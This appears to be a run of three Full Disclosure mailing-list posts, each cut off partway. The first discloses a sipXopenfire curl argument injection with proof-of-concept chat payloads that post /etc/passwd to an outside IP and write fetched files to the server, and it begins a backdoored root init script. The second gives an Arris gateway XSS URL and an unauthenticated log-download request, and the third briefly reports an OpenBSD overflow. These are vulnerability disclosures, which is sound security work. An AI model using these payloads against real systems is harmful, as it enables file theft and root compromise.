[FD] [CVE-2023-25355/25356] No fix available - vulnerabilities in CoreDial sipXcom sipXopenfire
_ ¯¯¯\__/ ༼ つ ◕_◕ ༽つ (ง'̀-'́)ง(╯°□°)╯︵ ┻━┻ ヽ(´ー`)ノ \__/¯¯ ¯ Product: sipXcom sipXopenfire Vendor: CoreDial Name: "sipXcom sipXopenfire XMPP message system command argument injection and insecure service file permissions RCE" Version: 21.04 and earlier Fixed: Nope, no response Link: http://download.sipxcom.org/ CVEs: CVE-2023-25355 & CVE-2023-25356 _ ¯¯\__/ ༼ つ ◕_◕ ༽つ (ง'̀-'́)ง(╯°□°)╯︵ ┻━┻ ヽ(´ー`)ノ \__/¯¯¯ ¯ TL;DR ¯ CoreDial's sipXcom is a PBX server. It bundles an XMPP server component sipXopenfire, which is disabled by default. sipXopenfire is affected by an OS command argument injection vulnerability (CVE-2023-25356), which allows any user with an XMPP account to pass arbitrary arguments to a curl command. The same component is also affected by a weak file permissions vulnerability (CVE-2023-25355), affecting a service startup script which runs as root. Both issues can be chained to execute commands as the system root user. At the time of this disclosure, we have had no response from CoreDial, and neither issue has been fixed. _ ¯ CVE-2023-25356: OS Command Argument Injection ¯ As part of the initializePlugin() routine in sipXopenfire\presence-plugin\src\org\sipfoundry\openfire\plugin\presence\SipXOpenfirePlugin.java, an "interceptor" called DefaultMessagePacketInterceptor is registered. The DefaultMessagePacketInterceptor inspects every message that's sent through the XMPP server. If a message starts with any of the strings "@call", "@conf" or "@xfer" (referred to internally as "directives"), a related code path is taken, where the message content is processed according to what the specific directive is meant to achieve. When a message is intercepted which starts with "@call", all the text after this string is assumed to be a phone number and passed to the buildRestCallCommand() function. This function creates a long URL, which the user input is written directly into. There's no particular attempt to sanitise this input. This URL is then passed to the sendRestRequest() function, where it is appended to a curl command string. This string is then passed to Runtime.getRuntime().exec(command). Due to the inner mechanics of Runtime's exec() function, we are only able to control arguments passed to the main curl command. The constructed curl command is as follows: ``` curl -k -X POST http://[IPAddress]:[Port]/callcontroller/[callerNumber]/[controlledString]timeout=30=true ``` Since we can inject arbitrary arguments, we can construct a set of arguments which will read a file using the -d/--data flag, and send it over the network to us. The only limitation is that the sipXopenfire process runs as the daemon user. So we can only read files that are accessible to daemon. However, this includes potentially interesting files, like the chat history (/opt/openfire/logs/sipxopenfire-im.log) when chat logging is enabled. As proof-of-concept, the following payload will read /etc/passwd and post it to http://192.168.96.128/abc. ``` @call abc -o/tmp/test123 -d @/etc/passwd http://192.168.96.128/abc ``` We can also download files and write them to the server filesystem. The following will download the file from http://192.168.96.128/test.txt and write it to /tmp/test.txt ``` @call abc -o /tmp/dummy -o /tmp/test.txt -X GET http://192.168.96.128/test.txt -o /tmp/dummy ``` _ ¯ CVE-2023-25355: Weak Service File Permissions ¯ The /etc/init.d/openfire service file is owned by the daemon user and group, but runs as the root user. This gives a relatively clear path to privilege escalation. It also provides a very useful exploitation path, when chained with the curl argument injection issue. Since we can download files and write them to the filesystem, and the sipXopenfire process runs as the daemon user, we can overwrite the /etc/init.d/openfire file with a modified version. The following modified /etc/init.d/openfire will return a shell to port on 192.168.96.128 when the sipXopenfire service is (re)started. ``` #!/bin/sh # # openfire Stops and starts the Openfire XMPP service. # # chkconfig: 2345 99 1 # description: Openfire is an XMPP
[FD] SEC Consult SA-20230306-0 :: Multiple Vulnerabilities in Arris DG3450 Cable Gateway
SEC Consult Vulnerability Lab Security Advisory < 20230306-0 > === title: Multiple Vulnerabilities product: Arris DG3450 Cable Gateway vulnerable version: AR01.02.056.18_041520_711.NCS.10 fixed version: - CVE number: CVE-2023-27571, CVE-2023-27572 impact: medium homepage: https://www.commscope.com found: 2022-10-21 by: S. Robertz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- Arris has been aquired by CommScope in 2019. "At CommScope we push the boundaries of communications technology to create the world’s most advanced networks. We design, manufacture, install and support the hardware infrastructure and software intelligence that enable our digital society to interact and thrive. Working with customers, we advance broadband, enterprise and wireless networks to power progress and create lasting connections. Across the globe, our people and solutions are redefining connectivity, solving today’s challenges and driving the innovation that will meet the needs of what’s next." Source: https://www.commscope.com/about-us/ Business recommendation: The vendor did not reply to any of our communication attempts. The security issues have not been fixed. Users of this product are urged to contact their support representative and request the vulnerabilities to be fixed. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: --- 1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572) An attacker can execute arbitrary JavaScript code in the context of the victim's session, thus perform all actions, exfiltrate information, etc. In order to exploit this vulnerability the attacker will have to trick the user into visiting a manipulated URL. 2) Missing Authentication (CVE-2023-27572) Logfiles can be downloaded without prior authentication, once the correct URL is known. This allows an attacker to gain further information about the usage of the device. Proof of concept: - 1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572) The following URL has to be visited by the victim in order to execute arbitrary JavaScript code. http://$IP/https_redirect.php?page=%22;alert(document.domain);var%20dummy=%22 2) Missing Authentication (CVE-2023-27572) The following HTTP request will return the log file of the device without checking for a valid session cookie. --- GET /troubleshooting_logs_download.php?log_type=system_frame=today HTTP/1.1 Host: $IP HTTP/1.1 200 OK X-Content-Type-Options: nosniff Set-Cookie: PHPSESSID=38b5a65ba1a4477e29efd73ee1e01554; path=/; HttpOnly X-XSS-Protection: 1; mode=block strict-transport-security: max-age=600; includeSubDomains Server: ARRIS Server X-Frame-Options: DENY Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'; worker-src blob: Cache-control: private Pragma: private Expires: 0 Content-type: text/plain;charset=utf-8 Content-Disposition: attachment; filename="troubleshooting_logs_system_today.txt" Content-Transfer-Encoding: binary Accept-Ranges: bytes Content-Length: 437 Date: Tue, 21 Jun 2022 20:51:07 GMT GUI: User:admin login 06/15/2022 22:46:56 Notice GUI: User:admin logout 06/15/2022 22:42:14 Notice GUI: User:admin logout 06/15/2022 22:41:26 Notice GUI: User:admin logout 06/15/2022 22:41:06 Notice GUI: User:admin logout 06/15/2022 22:40:47 Notice GUI: User:admin login 06/15/2022 22:33:22 Notice GUI: User:admin logout 06/15/2022 22:31:51 Notice --- Vulnerable / tested versions: - The vulnerabilities have been tested on the following device / firmware: * Arris DG3450 with software version AR01.02.056.18_041520_711.NCS.10 Vendor contact timeline: 2022-11-22: Contacting vendor through tac.helpd...@commscope.com; no response. 2022-12-05: Asking for security contact through @Arris Twitter social media No response. Received "You can no longer send messages to this person" after initial message. 2022-12-05: Contacting vendor via privacycont...@commscope.com; no response. 2023-01-24: Contacting vendor again via privacycont...@commscope.com and tac.helpd...@commscope.com; no response 2023-03-02
[FD] OpenBSD overflow
Hi, Fun OpenBSD bug. ip_dooptions() will allow IPOPT_SSRR with optlen = 2. save_rte() will set isr_nhops to very large value, which will cause overflow in next ip_srcroute() call. More info is here https://github.com/fuzzingrf/openbsd_tcpip_overflow/ -erg ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/